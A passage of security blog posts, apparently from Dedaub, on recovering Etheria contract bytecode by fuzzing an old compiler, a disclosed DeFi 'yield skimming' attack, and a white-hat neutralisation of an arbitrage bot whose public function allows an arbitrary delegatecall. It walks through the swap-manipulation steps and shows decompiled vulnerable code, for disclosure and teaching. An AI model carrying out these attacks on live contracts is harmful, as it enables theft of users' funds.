Dead ends started piling up, but every one was narrowing the search space.

  • The version of solc used was definitely 0.1.6, based on the timeline of releases. However, the exact build might have made a difference. And, in fact, our compiler was not solc but solc-js, the Javascript wrapper of solc. There are 17 different versions of solc-js v0.1.6. There are even different versions with the exact same filename — e.g., there are 4 different builds (different md5 hashes) all called soljson-v0.1.6–2015–11–03–48ffa08.js. However, no optimizations or compilation gadgets that would explain the difference were introduced in the different builds. We could see no correlation between the compiled code artifacts and the exact build of solc-js, just the occasional non-determinism.
  • Different optimization settings made too-drastic a difference. Browser-solidity did not even allow configuring optimization runs, so the only question was whether optimization was on at all, and it very clearly was, based on the deployed bytecode.
  • Non-determinism seemed to creep in, even for changes as simple as the filename used.

With so little left to try, frustration started building up. Was this just a random search? And over what? Blank space in the compiled file? Reordering of functions? Small source code changes that yielded equivalent code? Removing dead code from the source?

We tried many of these, ad hoc or systematically and the tiny but persistent differences from the deployed bytecode never went away. Private function reordering looked very promising for a little while. But a full match was nowhere to be seen.

A Breakthrough

Although still several days away from the solution, an important insight arose, after lots of trial and error.

Non-determinism was due to solc-js, the Javacript wrapper, not to individual invocations of the solc executable itself. Solc-js is using emscripten to run the native solc executable inside a Javascript engine. Emscripten back in the day was translating a binary into asm.js (not yet WASM). Something in this pipeline was introducing non-determinism.

But what kind? Since the solc executable was itself deterministic when invoked freshly, the insight was that the apparent non-determinism of solc-js depended on what had been compiled before, and not only on no-op features of the compiled file (e.g., comments, blanks, filename)! In fact, we saw blank space in the compiled file rarely make a difference in the output bytecode. However, earlier compiled files reliably affected the later output.

Christian Reitwiessner later confirmed that non-determinism was due to using native pointers (i.e., machine addresses) as keys in data structures, so that a re-run from scratch was likely to appear deterministic (objects were being allocated to the same positions on an empty address space) whereas a followup compilation depended on earlier actions.

We now had a more reliable lever to apply force to and cause shuffles in the compiled bytecode. And we could get systematic — we would basically be fuzzing the compiler! Our workhorse was the functionality below, which you can try for yourself:

https://dedaub.com/etheria/fuzzer.html

Open the dev console on your browser (F12) and hit “go”. It starts compiling random (unrelated) files before it tries the main file we aim to verify. The (pseudo-)randomization process is controlled by a seed, so that if a match is found it can be reproduced. The seed gets itself updated pseudo-randomly and the process repeats. The output looks like this:

current seed 449777 automate.js:116:11
...
compile 0 NEW soljson-v0.1.6-2015-10-16-d41f8b7.js etheria-1pt2_nov4.sol(1968d2bc81cfd17cd7fd8bfc6cbc4672) 1700cdc5e2c5fbb9f4ca49fe9fae1291 -4 5796 automate.js:72:11
--------- NEW BEST ------------- 5796 1700cdc5e2c5fbb9f4ca49fe9fae1291

Notice the highlighted parts: this compilation output is “new” (i.e., not seen with previous seeds), has a length distance of -4 from the target, and an edit distance of 5796, which is a new best.

If you observe the execution, you can appreciate how much entropy is revealed: new solutions arise with high frequency, even many hours into the execution.

This got our team tremendously excited. Our channel got filled with reports of “new bests”. 0-605 (same size, edit distance 605) gave way to 0-261. We requisitioned our largest server to run tens of parallel headless browser jobs using selenium. The 0–261 record dropped to 0–150. On every improvement we thought “it can’t get any closer!” And with many parallel jobs running for hours, we let the server crunch for the night.

Finale

The next morning found the search no closer to the goal. 0–150 was derived from several different seeds. This is just a single basic block of 5 instructions in the wrong place, which also causes some jump addresses to shift. But still, not a zero.

By the next evening, it was clear that our fuzzing was running out of entropy. A little disheartened, we tried an “entropy booster” of last resort: adding random whitespace to the top and bottom of all compiled programs. (In fact, this improved-entropy version is the one at the earlier link.) Within hours, the “new best” became 0–114! And yet the elusive zero was still to be seen. Could it be that we would never find it?

Nearly 24 hours later, with the server fuzzing non-stop during the weekend, the channel lit up:

GUYS

WE GOT IT

All that was left was cleanup,tightening, and packaging. We soon had a solution that required merely compiling two unrelated files before the final compilation of the Etheria code. We repeated the process with the compiler running in multi-file mode. We found similar seeds for present-day Remix. Everything became streamlined, optimized, easy to reproduce and verify. You can visualize a successful verification (for one compiler setup) here:

https://dedaub.com/etheria/verify.html

We notified Cyrus a couple of hours later. It was great news, delivered on a Saturday, and the joy was palpable. We had a Tuesday advising call with Christian that was quickly repurposed to be a storytelling and victory celebration. Within a few days, etherscan verified the contract bytecode manually, since solc 0.1.6 is too old to be supported in the automated workflow.

Looking back, there are a few remarkable elements in the whole endeavor. The first is the amount of random noise amplified during a non-deterministic compilation. For a very long time, the sequence of “new” unique compiled bytecodes seemed never ending. A search that now seems, clearly, feasible appeared for long to be hopeless. Another interesting observation is how quickly people got wrapped up into a needle-in-a-haystack search. The challenge of a tough riddle does that to you. Or maybe it was some ancient magic from the faraway Etheria land?

Yield Skimming: Forcing Bad Swaps on Yield Farming

By the Dedaub team

Yield Skimming

Last week we received bug bounties for disclosing smart contract vulnerabilities to Vesper Finance and BT Finance, via immunefi.com. Thank you, all!

(Notice for clients of these services: None of the vulnerabilities drain the original user funds. An attack would have financial impact, but not an overwhelming one. The maximum proceeds in the past few months would have been around $150K, and, once performed, the attack would be likely to alert the service to the vulnerability, making the attack non-repeatable. The vulnerabilities have since been mitigated and, to our knowledge, no funds are currently threatened.)

Both vulnerabilities follow the same pattern and many other services could potentially be susceptible to such attacks (though all others that we checked are not, by design or by circumstance — it will soon be clear what this means). It is, therefore, a good idea to document the pattern and draw some attention to it, as well as to its underlying financials.

Yield Skimming | The Attack

A common pattern in yield farming services is to have strategies that, upon a harvest, swap tokens on an exchange, typically Uniswap. A simplified excerpt from actual deployed code looks like this:

function harvest() public {
  withdrawTokenA(); 
  uint256 reward = TokenA.balanceOf(address(this));
  unirouter.swapExactTokensForTokens(reward, 0, pathTokenAB, this, now.add(1800));
  depositTokenB();
}

Example harvest function, with swapping.

Similar code is deployed in hundreds (if not thousands) of contracts. Typical uses of the pattern are a little more complex, with the harvest and the swap happening in different functions. But the essence remains unchanged. Similar code may also be found at the point where the service rebalances its holdings, rather than at the harvest point. We discuss harvest next, as it is rather more common.

[Short detour: you see that now.add(1800)for the “deadline” parameter of the swap? The add(1800) has no effect whatsoever. Inside a contract, the swap will always happen at time now, or not at all. The deadline parameter is only meaningful if you can give it a constant number.]

Back to our main pattern, the problem with the above code is that the harvest can be initiated by absolutely anyone! “What’s the harm?” — you may ask — “Whoever calls it pays gas, only to have the contract collect its rightful yield.”

The problem, however, is that the attacker can call harvest after fooling the Uniswap pool into giving bad prices for the yield. In this way, the victim contract distorts the pool even more, and the attacker can restore it for a profit: effectively the attacker can steal almost all of the yield, if its value is high enough.

In more detail, the attack goes like this:

a) the attacker distorts the Uniswap pool (the AssetA-to-AssetB pool) by selling a lot of the asset A that the strategy will try to swap. This makes the asset very cheap.

b) the attacker calls harvest. The pool does a swap at very bad prices for the asset.

c) the attacker swaps back the Asset B they got in the first step (plus a tiny bit more for an optimal attack) and gets the original asset A at amounts up to the original swapped (of step (a)) plus what the victim contract put in.

Yield Skimming

Yield Skimming | Example

For illustration, consider some concrete, and only slightly simplified, numbers. (If you are familiar with Uniswap and the above was all you needed to understand the attack, you can skip ahead to the parametric analysis.)

Say the harvest is in token A and the victim wants to swap that to token B. The Uniswap pool initially has
1000 A tokens and 500 B tokens. The “fair” price of an A denominated in Bs is 500/1000 = 0.5. The product k of the amounts of tokens is 500,000: this is a key quantity in Uniswap — the system achieves automatic pricing by keeping this product constant while swaps take place.

In step (a) the attacker swaps 1000 A tokens into Bs. This will give back to the attacker 250 B tokens, since the Uniswap pool now has
2000 A tokens and 250 B tokens (in order to keep the product k constant). The price of an A denominated in Bs has now temporarily dropped to a quarter of its earlier value: 0.125, as far as Uniswap is concerned.

In step (b) the victim’s harvest function tries to swap, say, 100 A tokens into Bs. However, the price the victim will get is now nowhere near a fair price. Instead, the Uniswap pool goes to
2100 A tokens and 238 B tokens, giving back to the victim just 12 B tokens from the swap.

In step (c) the attacker swaps back the 250 B tokens they got in step (a), or, even better, adds another 12 to reap maximum benefit from the pool skew. The pool is restored to balance at the initial
1000 A tokens and 500 B tokens. The attacker gets back 1100 A tokens for a price of 1000 A tokens and 12 B tokens. The attacker effectively got the 100 As that the victim swapped at 1/4th of the fair price.

Yield Skimming | Parametric Analysis

The simplistic example doesn’t capture an important element. The attacker is paying Uniswap fees for every swap they perform, at steps (a) and (c). Uniswap currently charges 0.3% of the swapped amount in fees for a direct swap. The net result is that the attack makes financial sense only when the amounts swapped by the victim are large. How large, you may ask? If the initial amount of token A in the pool is a and the victim will swap a quantity d of A tokens, when can an attacker make a profit, and what values x of A tokens does the attacker need to swap in step (a)? If you crunch the numbers, the cost-benefit analysis comes down to a cubic inequality. Instead of boring you with algebra, let’s ask Wolfram Alpha.

The result that Alpha calculates is that the attack is profitable as long as the number d of A tokens that the victim will swap is more than 0.3% of the number a of A tokens that the pool had initially. In the worst case, is significant (e.g., 10% of a, as in our example) and the attacker’s maximum profit is very close to the entire swapped amount.

Another consideration is gas prices, which we currently don’t account for. For swaps in the thousands of dollars, gas prices will be a secondary cost, anyway.

Yield Skimming | Mitigation

In practice, yield farming services protect against such attacks in one of the following ways:

  • They limit the callers of harvest or rebalance. This also needs care. Some services limit the direct callers of harvest but the trusted callers include contracts that have themselves public functions that call harvest.
  • They have bots that call harvest regularly, so that the swapped amounts never grow too much. Keep3r seems to be doing this consciously. This is fine but costly, since the service incurs gas costs even for harvests that don’t produce much yield.
  • They check the slippage suffered in the swap to ensure that the swap itself is not too large relative to the liquidity of the pool. We mention this to emphasize that it is not valid protection! Note the numbers in our above example. The problem with the victim’s swap in step (b) is not high slippage: the victim gets back 12 B tokens (11.9 to be exact) whereas with zero slippage they would have gotten back 12.5. This difference, of about 5%, may certainly pass a slippage check. The problem is not the 5% slippage but the 4x lower-than-fair price of the asset, to begin with!

There are other factors that can change the economics of this swap. For instance, the attacker could be already significantly vested in the Uniswap pool, thus making the swap fee effectively smaller for them. Also, Uniswap v3 was announced right at the time of this writing, and promises 0.05% fees for some price ranges (i.e., one-sixth of the current fees). This may make similar future attacks a lot more economical even for small swaps.

Conclusion

The pattern we found in different prominent DeFi services offers opportunities for interesting financial manipulation. It is an excellent representative of the joint code analysis (e.g., swap functionality reachable by untrusted callers) and financial analysis that are both essential in the modern Ethereum/DeFi security landscape.

Killing a Bad (Arbitrage) Bot … To Save Its Owner

Following the previous white-hat hacks (12), on contracts flagged by our analysis tools, today we’ll talk about another interesting contract. It’s hackable for about $80K, or rather its users are: the contract is just an enabler, having approvals from users and acting on their commands. However, a vulnerability in the enabler allows stealing all the users’ funds. (Of course, we have mitigated the vulnerability before posting the article.)

The vulnerable contract is a sophisticated arbitrage bot, with no source on Etherscan. Being an arbitrage bot, it’s not surprising that we were unable to identify either the contract owner/deployer or its users.

One may question whether we should have expended effort just to save an arbitrageur. However our mission is to secure the smart contract ecosystem — via our free contract-library service, research, consulting, and audits. Furthermore, arbitrage bots do have a legitimate function in the Ethereum space: the robustness of automated market makers (e.g., Uniswap) depends on the existence of bots. By having bots define a super-efficient trading market, price manipulators have no expected benefit from biasing a price: the bots will eat their profits. (Security guaranteed by the presence of relentless competition is an enormously cool element of the Ethereum ecosystem, in our book.)

Also, thankfully, this hack is a great learning opportunity. It showcases at least three interesting elements:

  • Lack of source code, or general security-by-obscurity, won’t save you for long in this space.
  • There is a rather surprising anti-pattern/bad smell in Solidity programming: the use of this.function(...) instead of just function(...).
  • It’s a lucky coincidence when an attack allows destroying the means of attack itself! In fact, it is the most benign mitigation possible, especially when trying to save someone who is trying to stay anonymous.

Following a Bad Smell

The enabler contract has no source code available. It is not even decompiled perfectly, with several low-level elements (e.g., use of memory) failing to be converted to high-level operations. Just as an example of the complexity, here is the key function for the attack and a crucial helper function (don’t pay too close attention yet — we’ll point you at specific lines later):

function 0xf080362c(uint256 varg0, uint256 varg1) public nonPayable { 
    require(msg.data.length - 4 >= 64);
    require(varg1 <= 0xffffffffffffffff);
    v0, v1 = 0x163d(4 + varg1, msg.data.length);
    assert(v0 + 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff < v0);
    v2 = 0x2225(v1, v1 + (v0 + 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff << 5));
    v3 = v4 = 0x16b6(96 + v2, v2 + 128);
    v5 = v6 = 0;
    while (v5 < v0) {
        if (varg0 % 100 >= 10) {
            assert(v5 < v0);
            v7 = 0x2225(v1, v1 + (v5 << 5));
            v8 = 0x16b6(64 + v7, v7 + 96);
            MEM[MEM[64]] = 0xdd62ed3e00000000000000000000000000000000000000000000000000000000;
            v9 = 0x1cbe(4 + MEM[64], v8, this);
            require((address(v3)).code.size);
            v10 = address(v3).staticcall(MEM[(MEM[64]) len (v9 - MEM[64])], MEM[(MEM[64]) len 32]).gas(msg.gas);
            if (v10) {
                MEM[64] = MEM[64] + (RETURNDATASIZE() + 31 & ~0x1f);
                v11 = 0x1a23(MEM[64], MEM[64] + RETURNDATASIZE());
                if (v11 < 0x8000000000000000000000000000000000000000000000000000000000000000) {
                    0x1150(0, v8, address(v3));
                    0x1150(0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff, v8, address(v3));
                }
            } else {
                RETURNDATACOPY(0, 0, RETURNDATASIZE());
                revert(0, RETURNDATASIZE());
            }
        }
        assert(v5 < v0);
        v12 = 0x2225(v1, v1 + (v5 << 5));
        v13 = 0x16b6(v12, v12 + 32);
        assert(v5 < v0);
        v14 = 0x2225(v1, v1 + (v5 << 5));
        v15 = 0x1a07(32 + v14, v14 + 64);
        assert(v5 < v0);
        v16 = 0x2225(v1, v1 + (v5 << 5));
        v17 = 0x16b6(64 + v16, v16 + 96);
        assert(v5 < v0);
        v18 = 0x2225(v1, v1 + (v5 << 5));
        v19 = 0x16b6(96 + v18, v18 + 128);
        assert(v5 < v0);
        v20 = 0x2225(v1, v1 + (v5 << 5));
        v21, v22 = 0x21c2(v20, v20 + 128);
        MEM[36 + MEM[64]] = address(v17);
        MEM[36 + MEM[64] + 32] = address(v3);
        MEM[36 + MEM[64] + 64] = v23;
        MEM[36 + MEM[64] + 96] = address(v19);
        MEM[36 + MEM[64] + 128] = 160;
        v24 = 0x1bec(v22, v21, 36 + MEM[64] + 160);
        MEM[MEM[64]] = v24 - MEM[64] + 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe0;
        MEM[64] = v24;
        MEM[MEM[64] + 32] = v15 & 0xffffffff00000000000000000000000000000000000000000000000000000000 | 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffff & MEM[MEM[64] + 32];
        v25 = 0x1c7e(MEM[64], MEM[64]);
        v26 = address(v13).delegatecall(MEM[(MEM[64]) len (v25 - MEM[64])], MEM[(MEM[64]) len 0]).gas(msg.gas);
        if (RETURNDATASIZE() == 0) {
            v27 = v28 = 96;
        } else {
            v27 = v29 = MEM[64];
            MEM[v29] = RETURNDATASIZE();
            RETURNDATACOPY(v29 + 32, 0, RETURNDATASIZE());
        }
        require(v26, 'delegatecall fail');
        v23 = v30 = 0x1a23(32 + v27, 32 + v27 + MEM[v27]);
        assert(v5 < v0);
        v31 = 0x2225(v1, v1 + (v5 << 5));
        v3 = v32 = 0x16b6(96 + v31, v31 + 128);
        v5 += 1;
    }
    v33 = 0x20bd(MEM[64], v23);
    return MEM[(MEM[64]) len (v33 - MEM[64])];
}

function 0x16b6(uint256 varg0, uint256 varg1) private { 
    require(varg1 - varg0 >= 32);
    v0 = msg.data[varg0];
    0x235c(v0);  // no-op
    return v0;
}

Key function decompiled. Unintelligible, right?

Faced with this kind of low-level complexity, one might be tempted to give up. However, there are many red flags. What we have in our hands is a publicly called function that performs absolutely no checks on who calls it. No msg.sender check, no checks to storage locations to establish the current state it’s called under, none of the common ways one would protect a sensitive piece of code.

And this code is not just sensitive, it is darn sensitive. It does a delegatecall (line 55) on an address that it gets from externally-supplied data (line 76)! Maybe this is worth a few hours of reverse engineering?

Vulnerable code in contracts is not rare, but most of these contracts are not used with real money. A query of token approvals and balances shows that this one is! There is a victim account that has approved the vulnerable enabler contract for all its USDT, all its WETH, and all its USDC.

Victim token approvals, including to the enabler (0x15cb5c845b…).

And how much exactly is the victim’s USDT, USDC, and WETH? Around $77K at the time of the snapshot below.

Victim’s balances.

Reverse Engineering

The above balances and suspicious code prompted us to do some manual reverse engineering. While also checking past transactions, the functionality of the vulnerable code was fairly easy to discern. At the end of our reverse-engineering session, here’s the massaged code that matters for the attack:

pragma experimental ABIEncoderV2;

contract VulnerableArbitrageBot is Ownable {

    struct Trade {
        address executorProxy;
        address fromToken;
        address toToken;
        ...
    }
    
    function performArbitrage(address initialToken, uint256 amt, ..., Trade[] trades memory) onlyOwner external {
        ...
        IERC20(initialToken).transferFrom(address(this), amt);
        ...
        this.performArbitrageInternal(..., trades); // notice the use of 'this'
    }
    
    function performArbitrageInternal(..., Trade[] trades memory) external {
        Trade memory trade = trades[i];
        for (uint i = 0; i < trades.length; i++) {
            // ...
            IERC20(trade.fromToken).approve(...);
            // ...
            trades[i].executorProxy.delegatecall(
              abi.encodeWithSignature("trade(address,address...)", trade.fromToken, trade.toToken, ...)
            );
        }
    }
}

interface TradeExecutor {
   function trade(...) external returns (uint) {
}

contract UniswapExecutor is TradeExecutor {
    function trade(address fromToken, address toToken, ... ) returns (uint) {
        // perform trade
        ...
    }
}

This function, 0xf080362c, or performArbitrageInternal as we chose to name it (since the hash has no publicly known reversal), is merely doing a series of trades, as instructed by its caller. Examining past transactions shows that the code is exploiting arbitrage opportunities.

Our enabler is an arbitrage bot and the victim account is the beneficiary of the arbitrage!

Since we did not fully reverse engineer the code, we cannot be sure what is the fatal flaw in the design. Did the programmers consider that the obscurity of bytecode-only deployment was enough protection? Did they make function 0xf080362c/performArbitrageInternal accidentally public? Is the attack prevented when this function is only called by others inside the contract?

We cannot be entirely sure, but we speculate that the function was accidentally made public. Reviewing the transactions that call 0xf080362c reveals that it is never called externally, only as an internal transaction from the contract to itself.

The function being unintentionally public is an excellent demonstration of a Solidity anti-pattern.

Whenever you see the code pattern <strong>this.function(...)</strong> in Solidity, you should double-check the code.

In most object-oriented languages, prepending this to a self-call is a good pattern. It just says that the programmer wants to be unambiguous as to the receiver object of the function call. In Solidity, however, a call of the form this.function() is an external call to one’s own functionality! The call starts an entirely new sub-transaction, suffers a significant gas penalty, etc. There are some legitimate reasons for this.function() calls, but nearly none when the function is defined locally and when it has side-effects.

Even worse, writing this.function() instead of just function() means that the function has to be public! It is not possible to call an internal function by writing this.function(), although just function() is fine.

This encourages making public something that probably was never intended to be.

The Operation

Armed with our reverse-engineered code, we could now put together attack parameters that would reach the delegatecall statement with our own callee. Once you reach a delegatecall, it’s game over! The callee gains full control of the contract’s identity and storage. It can do absolutely anything, including transferring the victim’s funds to an account of our choice.

But, of course, we don’t want to do that! We want to save the victim. And what’s the best way? Well, just destroy the means of attack, of course!

So, our actual attack does not involve the victim at all. We merely call selfdestruct on the enabler contract: the bot. The bot had no funds of its own, so nothing is lost by destroying it. To prevent re-deployment of an unfixed bot, we left a note on the Etherscan entry for the bot contract.

To really prevent deployment of a vulnerable bot, of course, one should commission the services of Dedaub. 🙂